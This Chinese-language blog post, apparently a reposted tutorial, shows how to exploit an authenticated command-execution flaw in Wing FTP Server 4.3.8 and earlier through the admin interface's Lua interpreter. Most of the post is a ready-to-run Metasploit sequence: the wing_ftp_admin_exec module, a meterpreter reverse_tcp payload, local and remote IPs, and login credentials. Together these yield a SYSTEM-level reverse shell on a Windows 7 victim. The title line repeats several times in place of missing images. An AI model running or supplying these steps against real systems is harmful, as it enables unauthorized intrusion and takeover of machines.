使用Wing FTP服务器认证命令执行来利用Windows PC

此模块在4.3.8及更低版本的管理Web界面中利用嵌入式Lua解释器。在提供特制的HTTP POST请求时,攻击者可以使用os.execute()在具有SYSTEM权限的目标上执行任意系统命令。
利用目标
Wing FTP 4.3.8
需求
攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole
使用Wing FTP服务器认证命令执行来利用Windows PC
现在输入  exploit use / windows / ftp / wing_ftp_admin_exec
msf exploit (wing_ftp_admin_exec)>set payload windows/meterpreter/reverse_tcp
msf exploit (wing_ftp_admin_exec)>set lhost 192.168.0.10 (IP of Local Host)
msf exploit (wing_ftp_admin_exec)>set rhost 192.168.0.5 (IP of Remote Host)
msf exploit (wing_ftp_admin_exec)>set username rajchandel
msf exploit (wing_ftp_admin_exec)>set password ——–
msf exploit (wing_ftp_admin_exec)>exploit
使用Wing FTP服务器认证命令执行来利用Windows PC
使用Wing FTP服务器认证命令执行来利用Windows PC
使用Wing FTP服务器认证命令执行来利用Windows PC
转载请注明本文链接: http://www.mayidui.net/t2398.html
话题: 命令执行
游客
登录后才可以回帖,登录 或者 注册